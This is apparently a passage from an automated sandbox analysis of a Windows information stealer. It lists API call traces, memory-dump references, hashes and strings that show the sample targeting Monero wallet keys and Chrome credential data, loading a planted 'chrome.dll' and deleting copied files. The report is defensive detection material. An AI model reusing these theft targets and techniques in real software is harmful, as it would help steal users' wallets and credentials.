                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: String___crt$Type
                                  • String ID:
                                  • API String ID: 2109742289-3916222277
                                  • Opcode ID: e96e42c19eaaa30597a8652bea4c4d87aa232c22cf23f90050519e3735419929
                                  • Instruction ID: 213ac71939138eb85da3c041b1217205170ba7334476b41dda4a7abfe8683e1a
                                  • Opcode Fuzzy Hash: e96e42c19eaaa30597a8652bea4c4d87aa232c22cf23f90050519e3735419929
                                  • Instruction Fuzzy Hash: 694107B014479C9EDB328B68CC85FFB7BEC9B45704F1444E8E98A961C2E2759E849F60
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00716903
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                    • Part of subcall function 0071ACC0: lstrlen.KERNEL32(?,011D8F90,?,\Monero\wallet.keys,00720E1A), ref: 0071ACD5
                                    • Part of subcall function 0071ACC0: lstrcpy.KERNEL32(00000000), ref: 0071AD14
                                    • Part of subcall function 0071ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0071AD22
                                    • Part of subcall function 0071ABB0: lstrcpy.KERNEL32(?,00720E1A), ref: 0071AC15
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 007169C6
                                  • ExitProcess.KERNEL32 ref: 007169F5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                  • String ID: <
                                  • API String ID: 1148417306-4251816714
                                  • Opcode ID: 5910202cf5fa6356e4cfd61f9666cfc4d7da41fa8408867a72e713302ea2d144
                                  • Instruction ID: 2c4d23b54ad366e523c5ca483c89e0a6916011207f6eef5a2d34d98c89c2c656
                                  • Opcode Fuzzy Hash: 5910202cf5fa6356e4cfd61f9666cfc4d7da41fa8408867a72e713302ea2d144
                                  • Instruction Fuzzy Hash: 4A3168F1916218EACB14EB94DC96FDEB778AF08300F400189F205621D1DF786A88CF69
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00720E10,00000000,?), ref: 007189BF
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 007189C6
                                  • wsprintfA.USER32 ref: 007189E0
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcesslstrcpywsprintf
                                  • String ID: %dx%d
                                  • API String ID: 1695172769-2206825331
                                  • Opcode ID: a9a4357564ef3b336ae7026c44d560dfc14abc448bb03fa2ff50f10c4f420788
                                  • Instruction ID: 161e44dd39974d95f739adce10b1c6afe40da37a323548beea768e454afcf04b
                                  • Opcode Fuzzy Hash: a9a4357564ef3b336ae7026c44d560dfc14abc448bb03fa2ff50f10c4f420788
                                  • Instruction Fuzzy Hash: 882160B1A99214AFDB00DFD8DC45FAEBBB8FB48710F10411AF615A72C0D77569408BA0
                                  APIs
                                  • LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 0070A098
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
                                  • API String ID: 1029625771-1545816527
                                  • Opcode ID: 1cde361075064e694e948a38c7af36f85f91e6aaadc62aa0785cfd26815bf488
                                  • Instruction ID: ad877f94c7a4fc348f1e9bfa3790d5f6a4a6e37043e169a068e3f3dcd85698db
                                  • Opcode Fuzzy Hash: 1cde361075064e694e948a38c7af36f85f91e6aaadc62aa0785cfd26815bf488
                                  • Instruction Fuzzy Hash: 8BF030705EE328FFD7109BE0ED44B66B3A4B315344F501526F005AB1D0E7B968C4EB62
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,007196AE,00000000), ref: 00718EEB
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00718EF2
                                  • wsprintfW.USER32 ref: 00718F08
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcesswsprintf
                                  • String ID: %hs
                                  • API String ID: 769748085-2783943728
                                  • Opcode ID: ca603b95d6c963481a649e4a7382402b4f0d19ea301433fe453c2e36bfea4262
                                  • Instruction ID: 9318348ebd271572ac30689f46c8df1155e28014ca5790949b944547ec1902a5
                                  • Opcode Fuzzy Hash: ca603b95d6c963481a649e4a7382402b4f0d19ea301433fe453c2e36bfea4262
                                  • Instruction Fuzzy Hash: 15E08670A9D308BBD700CBD4DD0AE5DB778EB04301F000195FE0987340E9715E409B91
                                  APIs
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                    • Part of subcall function 0071ACC0: lstrlen.KERNEL32(?,011D8F90,?,\Monero\wallet.keys,00720E1A), ref: 0071ACD5
                                    • Part of subcall function 0071ACC0: lstrcpy.KERNEL32(00000000), ref: 0071AD14
                                    • Part of subcall function 0071ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0071AD22
                                    • Part of subcall function 0071ABB0: lstrcpy.KERNEL32(?,00720E1A), ref: 0071AC15
                                    • Part of subcall function 00718CF0: GetSystemTime.KERNEL32(00720E1B,011DA4D8,007205B6,?,?,007013F9,?,0000001A,00720E1B,00000000,?,011D8F90,?,\Monero\wallet.keys,00720E1A), ref: 00718D16
                                    • Part of subcall function 0071AC30: lstrcpy.KERNEL32(00000000,?), ref: 0071AC82
                                    • Part of subcall function 0071AC30: lstrcat.KERNEL32(00000000), ref: 0071AC92
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0070AA11
                                  • lstrlen.KERNEL32(00000000,00000000), ref: 0070AB2F
                                  • lstrlen.KERNEL32(00000000), ref: 0070ADEC
                                    • Part of subcall function 0071AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0071AAF6
                                  • DeleteFileA.KERNEL32(00000000), ref: 0070AE73
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: 7609c98c76ec182a810d8a9e63a60cc9e97583bcc6e5cdeb97ac8f4d1f0e22b7
                                  • Instruction ID: f5156d0ac51e1ce8d13501e4ac503e1432c2326444402dea5cf62a1c67184385
                                  • Opcode Fuzzy Hash: 7609c98c76ec182a810d8a9e63a60cc9e97583bcc6e5cdeb97ac8f4d1f0e22b7
                                  • Instruction Fuzzy Hash: 16E106B2915118EBCB14FBA8EC66EEE7339AF14310F408559F116720D1EF386A88CB75
                                  APIs
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                    • Part of subcall function 0071ACC0: lstrlen.KERNEL32(?,011D8F90,?,\Monero\wallet.keys,00720E1A), ref: 0071ACD5
                                    • Part of subcall function 0071ACC0: lstrcpy.KERNEL32(00000000), ref: 0071AD14
                                    • Part of subcall function 0071ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0071AD22
                                    • Part of subcall function 0071ABB0: lstrcpy.KERNEL32(?,00720E1A), ref: 0071AC15
                                    • Part of subcall function 00718CF0: GetSystemTime.KERNEL32(00720E1B,011DA4D8,007205B6,?,?,007013F9,?,0000001A,00720E1B,00000000,?,011D8F90,?,\Monero\wallet.keys,00720E1A), ref: 00718D16
                                    • Part of subcall function 0071AC30: lstrcpy.KERNEL32(00000000,?), ref: 0071AC82
                                    • Part of subcall function 0071AC30: lstrcat.KERNEL32(00000000), ref: 0071AC92
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0070D581
                                  • lstrlen.KERNEL32(00000000), ref: 0070D798
                                  • lstrlen.KERNEL32(00000000), ref: 0070D7AC
                                  • DeleteFileA.KERNEL32(00000000), ref: 0070D82B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: c71be04ea74408abc343cf2312c4eba64e6fa2e0317d78dbfa18dd942ebbdede
                                  • Instruction ID: 792e1a10da7d764e5b0ecd067abf7d8bd998852369e08e8bb07983de873ac32d
                                  • Opcode Fuzzy Hash: c71be04ea74408abc343cf2312c4eba64e6fa2e0317d78dbfa18dd942ebbdede
                                  • Instruction Fuzzy Hash: CF912772A55118EBCB14FBA8EC6ADEE7339AF14310F404559F116720D1EF386A88CB72
                                  APIs
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                    • Part of subcall function 0071ACC0: lstrlen.KERNEL32(?,011D8F90,?,\Monero\wallet.keys,00720E1A), ref: 0071ACD5
                                    • Part of subcall function 0071ACC0: lstrcpy.KERNEL32(00000000), ref: 0071AD14
                                    • Part of subcall function 0071ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0071AD22
                                    • Part of subcall function 0071ABB0: lstrcpy.KERNEL32(?,00720E1A), ref: 0071AC15
                                    • Part of subcall function 00718CF0: GetSystemTime.KERNEL32(00720E1B,011DA4D8,007205B6,?,?,007013F9,?,0000001A,00720E1B,00000000,?,011D8F90,?,\Monero\wallet.keys,00720E1A), ref: 00718D16
                                    • Part of subcall function 0071AC30: lstrcpy.KERNEL32(00000000,?), ref: 0071AC82
                                    • Part of subcall function 0071AC30: lstrcat.KERNEL32(00000000), ref: 0071AC92
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0070D901
                                  • lstrlen.KERNEL32(00000000), ref: 0070DA9F
                                  • lstrlen.KERNEL32(00000000), ref: 0070DAB3
                                  • DeleteFileA.KERNEL32(00000000), ref: 0070DB32
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: a36b151030793ef18916d074fd181d32db700cca3cf2f2e70172fdbe77fe1702
                                  • Instruction ID: 4d89add200bae3ee51c23657d6d5f595c35385fb62db296f2f0e4b1da76659d2
                                  • Opcode Fuzzy Hash: a36b151030793ef18916d074fd181d32db700cca3cf2f2e70172fdbe77fe1702
                                  • Instruction Fuzzy Hash: 508105B2A55114EBCB14FBE8EC6ADEE7339AF14310F404559F116660D1EF386A88CB72
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AdjustPointer
                                  • String ID:
                                  • API String ID: 1740715915-0
                                  • Opcode ID: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                  • Instruction ID: efecfe964102cedfad5a989fefd31541a0ff372d92b5fe105858a52599277622
                                  • Opcode Fuzzy Hash: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                  • Instruction Fuzzy Hash: 5C51BE72600206EFEF39AF54CA45BBA77A4FF01350F24853DE90986691EB39ED44DB90
                                  APIs
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 0070A664
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocLocallstrcpy
                                  • String ID: @$v10$v20
                                  • API String ID: 2746078483-278772428
                                  • Opcode ID: 6b505f17501b2a4e70cd4603aeb1e3ece9d1f10e9fb18cbe1ec210c52e587220
                                  • Instruction ID: 491165f3fcc367877ad4d325e24d3f3de001f5413b081e2ce1402396e8a25119
                                  • Opcode Fuzzy Hash: 6b505f17501b2a4e70cd4603aeb1e3ece9d1f10e9fb18cbe1ec210c52e587220
                                  • Instruction Fuzzy Hash: 1A514C70A50208EFDB24DFA8DDAAFED77B6AF54300F408118F90A5B1D1EB786A45CB51
                                  APIs
                                    • Part of subcall function 0071AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0071AAF6
